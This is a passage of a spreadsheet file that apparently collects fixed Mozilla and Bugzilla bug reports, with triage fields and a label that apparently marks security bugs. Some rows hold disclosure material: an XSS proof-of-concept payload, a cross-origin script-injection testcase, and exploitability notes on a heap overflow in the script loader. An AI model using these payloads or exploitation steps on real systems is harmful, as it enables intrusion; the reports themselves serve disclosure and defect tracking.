          <t>45 Branch</t>
        </is>
      </c>
      <c r="L1240" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1240" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1240" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1240" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1240" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+][adv-esr45.5+]</t>
        </is>
      </c>
      <c r="Q1240" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1240" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1240" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T1240" t="n">
        <v>1</v>
      </c>
      <c r="U1240" t="n">
        <v>0</v>
      </c>
      <c r="V1240" t="n">
        <v>18</v>
      </c>
      <c r="W1240" t="inlineStr">
        <is>
          <t>Created attachment 8787005
poc.zip
While loading external script data, the following code is executed in nsScriptLoadHandler (nsScriptLoader.cpp):
nsresult
nsScriptLoadHandler::TryDecodeRawData(const uint8_t* aData,
                                      uint32_t aDataLength,
                                      bool aEndOfStream)
{
  int32_t srcLen = aDataLength;
  const char* src = reinterpret_cast&lt;const char *&gt;(aData);
  int32_t dstLen;
  nsresult rv =
    mDecoder-&gt;GetMaxLength(src, srcLen, &amp;dstLen);
  NS_ENSURE_SUCCESS(rv, rv);
  uint32_t haveRead = mBuffer.length();
  uint32_t capacity = haveRead + dstLen;        // [[ 1 ]]
  if (!mBuffer.reserve(capacity)) {
    return NS_ERROR_OUT_OF_MEMORY;
  }
  rv = mDecoder-&gt;Convert(src,
                      &amp;srcLen,
                      mBuffer.begin() + haveRead,
                      &amp;dstLen);
  NS_ENSURE_SUCCESS(rv, rv);
  haveRead += dstLen;
  MOZ_ASSERT(haveRead &lt;= capacity, "mDecoder produced more data than expected");
  MOZ_ALWAYS_TRUE(mBuffer.resizeUninitialized(haveRead));
  return NS_OK;
}
The calculation of the new capacity at [[ 1 ]] can overflow if enough data is sent by the server (&gt;4GB). In that case, the following call to mBuffer.reserve() won't change the size of mBuffer. Afterwards, mDecoder-&gt;Convert() will write data past the end of the 8GB buffer (mBuffer stores char16_t) [1].
poc.py (requires python 3.5) in the attached archive will trigger this condition and cause an access violation while writing data into an unmapped region following the buffer (tested on Firefox 48.0.1 and Aurora):
    Process 97720 stopped
    * thread #1: tid = 0x19afd5, 0x0000000101c66c68 XUL`nsOneByteDecoderSupport::Convert(char const*, int*, char16_t*, int*) [inlined] nsUnicodeDecodeHelper::ConvertByFastTable(aSrcLength=&lt;unavailable&gt;, aDestLength=&lt;unavailable&gt;) + 9 at nsUnicodeDecodeHelper.cpp:206, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x577000000)
    frame #0: 0x0000000101c66c68 XUL`nsOneByteDecoderSupport::Convert(char const*, int*, char16_t*, int*) [inlined] nsUnicodeDecodeHelper::ConvertByFastTable(aSrcLength=&lt;unavailable&gt;, aDestLength=&lt;unavailable&gt;) + 9 at nsUnicodeDecodeHelper.cpp:206
       203    }
       204
       205    for (; src&lt;srcEnd;) {
    -&gt; 206      *dest = aFastTable[*src];
       207      if (*dest == 0xfffd &amp;&amp; aErrorSignal) {
       208        res = NS_ERROR_ILLEGAL_INPUT;
       209        break;
    (lldb) bt
    frame #0: 0x0000000101c66c68 XUL`nsOneByteDecoderSupport::Convert(char const*, int*, char16_t*, int*) [inlined] nsUnicodeDecodeHelper::ConvertByFastTable(aSrcLength=&lt;unavailable&gt;, aDestLength=&lt;unavailable&gt;) + 9 at nsUnicodeDecodeHelper.cpp:206
    frame #1: 0x0000000101c66c5f XUL`nsOneByteDecoderSupport::Convert(this=0x0000000112a0e800, aSrc="", aSrcLength=0x00007fff5fbfcc6c, aDest=u"", aDestLength=0x00007fff5fbfcc68) + 207 at nsUCSupport.cpp:273
    frame #2: 0x0000000102a5c3f2 XUL`nsScriptLoadHandler::TryDecodeRawData(this=0x00000001290eb740, aData="", aDataLength=&lt;unavailable&gt;, aEndOfStream=&lt;unavailable&gt;) + 146 at nsScriptLoader.cpp:2752
    frame #3: 0x0000000102a5be73 XUL`nsScriptLoadHandler::OnIncrementalData(this=0x00000001290eb740, aLoader=&lt;unavailable&gt;, aContext=&lt;unavailable&gt;, aDataLength=101, aData="", aConsumedLength=0x00007fff5fbfccf4) + 83 at nsScriptLoader.cpp:2720
    ...
Some notes regarding exploitability:
    - It is possible to use compression to reduce the network load. The attached PoC code does that and thus only needs to send about 18MB of data.
    - It should be possible to place some objects behind the buffer, as mmap will usually allocate adjacent memory regions. This could be done as follows:
        - The server sends the first 0xffffffff bytes of the payload, causing an allocation of an 8GB memory region
        - JavaScript code executes and allocates lots of target objects. At some point new memory is requested via mmap, which should be placed behind the 8GB buffer
        - The server sends the remaining data, overflowing into the previously allocated objects
    - Due to page deduplication and/or compression beeing performed by the kernel, it should be possible to trigger the bug while having less than 8GB of available RAM. At least on my Mac this seems to be the case as memory usage stays relatively low even during the allocations.
    - A 64-bit build of Firefox is required so the bug can be triggered.
    - The data that is being written is not 100% controlled as it must be valid UTF-16
[1] There is a special case when the capacity wraps around to zero. In that case the process will (likely) not crash as the overflow only happens inside the 8GB chunk.</t>
        </is>
      </c>
      <c r="X1240" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1241">
      <c r="A1241" t="n">
        <v>643450</v>
      </c>
      <c r="B1241" t="inlineStr">
        <is>
          <t>2011-03-21 09:51:05 -0700</t>
        </is>
      </c>
      <c r="C1241" t="inlineStr">
        <is>
          <t>Problem with nsJSContext::CallEventHandler</t>
        </is>
      </c>
      <c r="D1241" t="inlineStr">
        <is>
          <t>2011-11-09 15:25:59 -0800</t>
        </is>
      </c>
      <c r="E1241" t="n">
        <v>1</v>
      </c>
      <c r="F1241" t="n">
        <v>1</v>
      </c>
      <c r="G1241" t="n">
        <v>3</v>
      </c>
      <c r="H1241" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1241" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1241" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1241" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1241" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1241" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1241" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1241" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1241" t="inlineStr">
        <is>
          <t>[sg:critical][qa-examined-192][qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q1241" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1241" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1241" t="inlineStr">
        <is>
          <t>mozilla5</t>
        </is>
      </c>
      <c r="T1241" t="n">
        <v>1</v>
      </c>
      <c r="U1241" t="n">
        <v>0</v>
      </c>
      <c r="V1241" t="n">
        <v>20</v>
      </c>
      <c r="W1241" t="inlineStr">
        <is>
          <t>In nsJSContext::CallEventHandler, after popping a principal, when converting
rval to variant, we access properties of rval if rval is an array.  Thus, it's
possible to call a native function without a frame or a pushed principal, in
which case a result of nsScriptSecurityManager::IsCapabilityEnabled() is true.</t>
        </is>
      </c>
      <c r="X1241" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1242">
      <c r="A1242" t="n">
        <v>1514728</v>
      </c>
      <c r="B1242" t="inlineStr">
        <is>
          <t>2018-12-17 05:06:15 -0800</t>
        </is>
      </c>
      <c r="C1242" t="inlineStr">
        <is>
          <t>Crash in nsHtml5StreamParser::DoDataAvailableBuffer</t>
        </is>
      </c>
      <c r="D1242" t="inlineStr">
        <is>
          <t>2018-12-18 20:30:43 -0800</t>
        </is>
      </c>
      <c r="E1242" t="n">
        <v>1</v>
      </c>
      <c r="F1242" t="n">
        <v>1</v>
      </c>
      <c r="G1242" t="n">
        <v>3</v>
      </c>
      <c r="H1242" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1242" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1242" t="inlineStr">
        <is>
          <t>DOM: HTML Parser</t>
        </is>
      </c>
      <c r="K1242" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1242" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1242" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1242" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1242" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1242" t="inlineStr"/>
      <c r="Q1242" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1242" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1242" t="inlineStr">
        <is>
          <t>mozilla66</t>
        </is>
      </c>
      <c r="T1242" t="n">
        <v>1</v>
      </c>
      <c r="U1242" t="n">
        <v>0</v>
      </c>
      <c r="V1242" t="n">
        <v>6</v>
      </c>
      <c r="W1242" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-efb1a209-ac59-40f7-8218-093a00181216.
=============================================================
Top 10 frames of crashing thread:
0 libxul.so nsHtml5StreamParser::DoDataAvailableBuffer mfbt/Span.h:612
1 libxul.so nsHtml5StreamListener::OnDataAvailable parser/html/nsHtml5StreamParser.cpp:1347
2 libxul.so nsBaseChannel::OnDataAvailable netwerk/base/nsBaseChannel.cpp:825
3 libxul.so nsInputStreamPump::OnInputStreamReady netwerk/base/nsInputStreamPump.cpp:555
4 libxul.so nsInputStreamReadyEvent::Run xpcom/io/nsStreamUtils.cpp:91
5 libxul.so nsThread::ProcessNextEvent xpcom/threads/nsThread.cpp:1157
6 libxul.so NS_ProcessNextEvent xpcom/threads/nsThreadUtils.cpp:468
7 libxul.so mozilla::ipc::MessagePumpForNonMainThreads::Run ipc/glue/MessagePump.cpp:303
8 libxul.so nsThread::ThreadFunc ipc/chromium/src/base/message_loop.cc:314
9 libnspr4.so _pt_root nsprpub/pr/src/pthreads/ptthread.c:201
=============================================================
The first affected build seems to be 20181213224257.</t>
        </is>
      </c>
      <c r="X1242" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1243">
      <c r="A1243" t="n">
        <v>1552541</v>
      </c>
      <c r="B1243" t="inlineStr">
        <is>
          <t>2019-05-17 09:54:20 -0700</t>
        </is>
      </c>
      <c r="C1243" t="inlineStr">
        <is>
          <t>Inner window reuse does not play nicely with document.domain</t>
        </is>
      </c>
      <c r="D1243" t="inlineStr">
        <is>
          <t>2019-11-21 13:10:24 -0800</t>
        </is>
      </c>
      <c r="E1243" t="n">
        <v>1</v>
      </c>
      <c r="F1243" t="n">
        <v>1</v>
      </c>
      <c r="G1243" t="n">
        <v>3</v>
      </c>
      <c r="H1243" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1243" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1243" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1243" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1243" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1243" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1243" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1243" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1243" t="inlineStr">
        <is>
          <t>[adv-main68+][adv-esr60.8+]</t>
        </is>
      </c>
      <c r="Q1243" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1243" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1243" t="inlineStr">
        <is>
          <t>mozilla69</t>
        </is>
      </c>
      <c r="T1243" t="n">
        <v>1</v>
      </c>
      <c r="U1243" t="n">
        <v>0</v>
      </c>
      <c r="V1243" t="n">
        <v>25</v>
      </c>
      <c r="W1243" t="inlineStr">
        <is>
          <t>Consider this testcase:
```
&lt;script&gt;
  document.domain = document.domain;
  var e;
  function doIt() {
    var win = window.open("newtab.html");
    win.hello = 5;
    e = win.eval;
  }
  function proceed() {
    e("document.body.innerHTML += 'hey'");
  }
&lt;/script&gt;
&lt;button type="button" onclick="doIt()"&gt;Open a new tab&lt;/button&gt;
&lt;button type="button" onclick="proceed()"&gt;Inject script&lt;/button&gt;
```
where newtab.html looks like this:
```
&lt;script&gt;
  document.write(window.hello);
&lt;/script&gt;
```
Per spec, and in Gecko, if you click the "Open a new tab" button, wait for the new page to load, switch back to the testcase, and then press the "Inject script" button, you will see the text "5 hey" in the new tab.
What's going on here is that inner window reuse does not consider `document.domain` (see https://html.spec.whatwg.org/multipage/browsing-the-web.html#initialise-the-document-object step 1), so we end up reusing the inner window here.  In Gecko, you can get the same effect by inserting a new iframe to a same-origin URL and immediately grabbing `.contentWindow.Function`; after that you can run any script you want in the new page that loads, even though it has _not_ set document.domain.
What this means is that if you have a page at `a.example.com` and a page at `b.example.com` that both set domain to `example.com`, now the `b.example.com` page can inject script into _any_ `a.example.com` page by doing the above!
This is a longstanding problem in Gecko, even back when we revoked access on document.domain changes, because we don't remap wrappers on inner window reuse.  It basically dates back to bug 956382, where stopped considering domain for inner window reuse purposes.
Before Firefox 67, any objects you pulled out of the page you're attacking would get opaque wrappers (which caused problems like bug 1551272, actually, in non-attack scenarious, since you'd get an opaque wrapper for `win.postMessage`), but you can still inject script and exfiltrate data via sending it to servers, of course.  Or just inject script that sets document.domain and then you have full access.
In 67, even the opaque-wrapper thing is gone; remapping wrappers on inner window reuse would not help there.
I just did a bit of testing, and as far as I can tell, Chrome and Safari reuse the inner in a _lot_ fewer cases than us.  They don't seem to do it for dynamically injected (not parser-created) subframes, and more importantly they don't seem to do it in the testcase above (`window.hello` ends up `undefined` in `newtab.html`).  They _do_ reuse if I take out the `document.domain = document.domain` line.
So maybe we should just make `WouldReuseInnerWindow()` do `EqualsConsideringDomain()` (which means never reuse if `document.domain` was set)?</t>
        </is>
      </c>
      <c r="X1243" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1244">
      <c r="A1244" t="n">
        <v>1215885</v>
      </c>
      <c r="B1244" t="inlineStr">
        <is>
          <t>2015-10-17 20:17:17 -0700</t>
        </is>
      </c>
      <c r="C1244" t="inlineStr">
        <is>
          <t>Shutdown crash [@ mozilla::storage::Service::Observe] with privacy.sanitize.sanitizeOnShutdown</t>
        </is>
      </c>
      <c r="D1244" t="inlineStr">
        <is>
          <t>2015-11-01 04:23:00 -0800</t>
        </is>
      </c>
      <c r="E1244" t="n">
        <v>1</v>
      </c>
      <c r="F1244" t="n">
        <v>1</v>
      </c>
      <c r="G1244" t="n">
        <v>2</v>
      </c>
      <c r="H1244" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1244" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1244" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K1244" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1244" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1244" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1244" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1244" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1244" t="inlineStr"/>
      <c r="Q1244" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1244" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1244" t="inlineStr">
        <is>
          <t>Firefox 44</t>
        </is>
      </c>
      <c r="T1244" t="n">
        <v>1</v>
      </c>
      <c r="U1244" t="n">
        <v>0</v>
      </c>
      <c r="V1244" t="n">
        <v>25</v>
      </c>
      <c r="W1244" t="inlineStr">
        <is>
          <t>1. Create a directory with the following prefs.js:
  user_pref("privacy.sanitize.sanitizeOnShutdown", true);
  user_pref("browser.tabs.remote.autostart", false);
  user_pref("browser.tabs.remote.autostart.1", false);
  user_pref("browser.tabs.remote.autostart.2", false);
2. Run a Firefox with e.g. "-profile ~/pdir/"
3. Quit Firefox
Result:
  * Lots of JS errors, starting with "Error sanitizing cookies"
  * In debug builds only, a crash [@ mozilla::storage::Service::Observe]</t>
        </is>
      </c>
      <c r="X1244" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1245">
      <c r="A1245" t="n">
        <v>1221518</v>
      </c>
      <c r="B1245" t="inlineStr">
        <is>
          <t>2015-11-04 05:37:06 -0800</t>
        </is>
      </c>
      <c r="C1245" t="inlineStr">
        <is>
          <t>[SECURITY] XSS in dependency graphs when displaying the bug summary</t>
        </is>
      </c>
      <c r="D1245" t="inlineStr">
        <is>
          <t>2024-05-30 09:06:50 -0700</t>
        </is>
      </c>
      <c r="E1245" t="n">
        <v>1</v>
      </c>
      <c r="F1245" t="n">
        <v>1</v>
      </c>
      <c r="G1245" t="n">
        <v>4</v>
      </c>
      <c r="H1245" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1245" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1245" t="inlineStr">
        <is>
          <t>Dependency Views</t>
        </is>
      </c>
      <c r="K1245" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1245" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1245" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1245" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1245" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1245" t="inlineStr"/>
      <c r="Q1245" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1245" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1245" t="inlineStr">
        <is>
          <t>Bugzilla 4.2</t>
        </is>
      </c>
      <c r="T1245" t="n">
        <v>1</v>
      </c>
      <c r="U1245" t="n">
        <v>0</v>
      </c>
      <c r="V1245" t="n">
        <v>22</v>
      </c>
      <c r="W1245" t="inlineStr">
        <is>
          <t>During the generation of a dependency graph also the code for the html image map is generated if a local dot installation is used.
With html escaped characters in a bug summary it is possible to inject custom lines in the *.map file with which the CreateImagemap function generates html code without filtering.
poc:
- configure bugzilla to use a local dot installation to generate a dependency graph
- create a bug with the following summary: &amp;#10;default "&gt;&lt;script&gt;alert(1)&lt;/script&gt; G
- visit /showdependencygraph.cgi?id=&lt;BUG-ID&gt;&amp;showsummary=on&amp;display=tree&amp;rankdir=TB, a javascript alert prompt will show up</t>
        </is>
      </c>
      <c r="X1245" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1246">
      <c r="A1246" t="n">
        <v>504843</v>
      </c>
      <c r="B1246" t="inlineStr">
        <is>
          <t>2009-07-17 10:38:45 -0700</t>
        </is>
      </c>
      <c r="C1246" t="inlineStr">
        <is>
          <t>crash (segfault) @ oc_sb_create_plane_mapping when playing corrupted ogg theora file</t>
        </is>
      </c>
      <c r="D1246" t="inlineStr">
        <is>
          <t>2012-06-29 18:56:39 -0700</t>
        </is>
      </c>
      <c r="E1246" t="n">
        <v>1</v>
      </c>
      <c r="F1246" t="n">
        <v>1</v>
      </c>
      <c r="G1246" t="n">
        <v>3</v>
      </c>
      <c r="H1246" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1246" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1246" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K1246" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1246" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1246" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1246" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1246" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1246" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1246" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1246" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1246" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1246" t="n">
        <v>1</v>
      </c>
      <c r="U1246" t="n">
        <v>0</v>
      </c>
      <c r="V1246" t="n">
        <v>35</v>
      </c>
      <c r="W1246" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11
Build Identifier: mozilla-central revision 19e12cf52506
Segmentation fault when playing corrupted ogg theora file (attached).
Reproducible: Always
Steps to Reproduce:
1. Load attached file.
Actual Results:  
firefox crashes
Expected Results:  
some sort of "this file is corrupted" message</t>
        </is>
      </c>
      <c r="X1246" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1247">
      <c r="A1247" t="n">
        <v>960135</v>
      </c>
      <c r="B1247" t="inlineStr">
        <is>
          <t>2014-01-15 09:21:59 -0800</t>
        </is>
      </c>
      <c r="C1247" t="inlineStr">
        <is>
          <t>local file access via Open Link in new Tab</t>
        </is>
      </c>
      <c r="D1247" t="inlineStr">
        <is>
          <t>2020-12-21 10:38:46 -0800</t>
        </is>
      </c>
      <c r="E1247" t="n">
        <v>1</v>
      </c>
      <c r="F1247" t="n">
        <v>1</v>
      </c>
      <c r="G1247" t="n">
        <v>6</v>
      </c>
      <c r="H1247" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1247" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J1247" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1247" t="inlineStr">
        <is>
          <t>26 Branch</t>
        </is>
      </c>
      <c r="L1247" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1247" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1247" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1247" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1247" t="inlineStr">
        <is>
          <t>[adv-main28+]</t>
        </is>
      </c>
      <c r="Q1247" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1247" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1247" t="inlineStr">
        <is>
          <t>Firefox 29</t>
        </is>
      </c>
      <c r="T1247" t="n">
        <v>1</v>
      </c>
      <c r="U1247" t="n">
        <v>0</v>
      </c>
      <c r="V1247" t="n">
        <v>18</v>
      </c>
      <c r="W1247" t="inlineStr">
        <is>
          <t>Created attachment 8360490
clickj3.html
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 (Beta/Release)
Build ID: 20131205075310
Steps to reproduce:
Create a link which is using the file:/// uri
&lt;a href="file:///"&gt;clickme&lt;/a&gt;
Now keep the finger on the hyperlink until a pop appears. Click on open in new tab.
A new tab which points to file:/// will be opened
Actual results:
A new tab was openend with the local file path.
If you know the path of a local file (as an example by dropping a prepared html file via a download) an attacker would be able to open and execute a local file.
Expected results:
The expected result should be either an empty (about:blank) new tab or no tab at all.
If you right click on the same hyperlink on the the desktop version of firefox and you choose open in new tab, nothing happens.</t>
        </is>
      </c>
      <c r="X1247" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1248">
      <c r="A1248" t="n">
        <v>1355020</v>
      </c>
      <c r="B1248" t="inlineStr">
        <is>
          <t>2017-04-10 01:44:04 -0700</t>
        </is>
      </c>
      <c r="C1248" t="inlineStr">
        <is>
          <t>Include update and other 'notification' UI on hamburger panel in new Photon hamburger panel</t>
        </is>
      </c>
      <c r="D1248" t="inlineStr">
        <is>
          <t>2018-01-10 17:32:32 -0800</t>
        </is>
      </c>
      <c r="E1248" t="n">
        <v>1</v>
      </c>
      <c r="F1248" t="n">
        <v>1</v>
      </c>
      <c r="G1248" t="n">
        <v>2</v>
      </c>
      <c r="H1248" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1248" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1248" t="inlineStr">
        <is>
          <t>Toolbars and Customization</t>
        </is>
      </c>
      <c r="K1248" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L1248" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1248" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1248" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1248" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1248" t="inlineStr">
        <is>
          <t>[photon-structure]</t>
        </is>
      </c>
      <c r="Q1248" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1248" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1248" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T1248" t="n">
        <v>1</v>
      </c>
      <c r="U1248" t="n">
        <v>0</v>
      </c>
      <c r="V1248" t="n">
        <v>18</v>
      </c>
      <c r="W1248" t="inlineStr">
        <is>
          <t>We currently show update notifications in the hamburger panel, including badges on the panel button. Sideloaded add-on notifications also appear there, and bug 893505 simplified some of the logic there.
When swapping out the panel menu for one with a different layout, these notifications will continue to need a place to go. The badges can stay the same, but the design at https://mozilla.invisionapp.com/share/5ZAEYEW8M#/screens/218570316 will need to be updated to include such notifications.</t>
        </is>
      </c>
      <c r="X1248" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1249">
      <c r="A1249" t="n">
        <v>1161317</v>
      </c>
      <c r="B1249" t="inlineStr">
        <is>
          <t>2015-05-04 16:03:57 -0700</t>
        </is>
      </c>
      <c r="C1249" t="inlineStr">
        <is>
          <t>Incorrect encryption of RTCP Packets when using unidirectional PeerConnections</t>
        </is>
      </c>
      <c r="D1249" t="inlineStr">
        <is>
          <t>2015-06-10 08:49:10 -0700</t>
        </is>
      </c>
      <c r="E1249" t="n">
        <v>1</v>
      </c>
      <c r="F1249" t="n">
        <v>1</v>
      </c>
      <c r="G1249" t="n">
        <v>3</v>
      </c>
      <c r="H1249" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1249" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1249" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K1249" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L1249" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1249" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1249" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1249" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1249" t="inlineStr"/>
      <c r="Q1249" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1249" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1249" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T1249" t="n">
        <v>1</v>
      </c>
      <c r="U1249" t="n">
        <v>0</v>
      </c>
      <c r="V1249" t="n">
        <v>21</v>
      </c>
      <c r="W1249" t="inlineStr">
        <is>
          <t>When using unidirectional PeerConnections (the sender has a MediaStream attached, the receiver doesn't) the RTCP generated by the sender is not encrypted properly.  At least it is a problem with the SR packets, which makes not possible to synchronize audio and video on the receiver side. 
How to reproduce it:
1) Activate NSPR logs including mediapipeline:9
2) Open this page https://dl.dropboxusercontent.com/u/1806026/ff_unidirectional.html
3) Find SRTCP errors in the logs: "Error unprotecting SRTCP packet error=7"</t>
        </is>
      </c>
      <c r="X1249" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1250">
      <c r="A1250" t="n">
        <v>1223670</v>
      </c>
      <c r="B1250" t="inlineStr">
        <is>
          <t>2015-11-10 21:54:19 -0800</t>
        </is>
      </c>
      <c r="C1250" t="inlineStr">
        <is>
          <t>"Assertion failure: cycleStackMarker == ps-&gt;mCycleMarker"</t>
        </is>
      </c>
      <c r="D1250" t="inlineStr">
        <is>
          <t>2016-10-11 19:46:55 -0700</t>
        </is>
      </c>
      <c r="E1250" t="n">
